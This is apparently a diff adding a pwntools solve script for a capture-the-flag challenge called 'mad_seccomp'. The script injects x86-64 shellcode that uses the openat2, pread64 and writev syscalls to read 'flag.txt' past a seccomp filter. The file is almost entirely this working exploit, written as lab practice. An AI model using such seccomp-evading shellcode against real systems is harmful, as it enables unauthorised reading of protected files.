solve script

random_challs/mad_seccomp/a.py

@@ -0,0 +1,40 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./mad_seccomp", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.send(a)
+
+# shellcode
+sc = """
+lea rsi, [rax+108]
+lea rdx, [rax+200]
+mov QWORD PTR [rdx], 2
+mov QWORD PTR [rdx+16], 16
+mov rax, 437
+mov rdi, -100
+mov r10, 24
+syscall
+mov rdi, rax
+mov al, 17
+lea rsi, [rdx+100]
+mov rdx, 100
+sub r10b, r10b
+syscall
+lea r11, [rsi]
+mov QWORD PTR [rsi+100], r11
+mov QWORD PTR [rsi+108], rax
+mov rdi, 1
+lea rsi, [rsi+100]
+mov rdx, 1
+mov rax, 20
+syscall
+"""
+sc = asm(sc)
+sc += b"flag.txt\0"
+s(sc)
+
+r.interactive()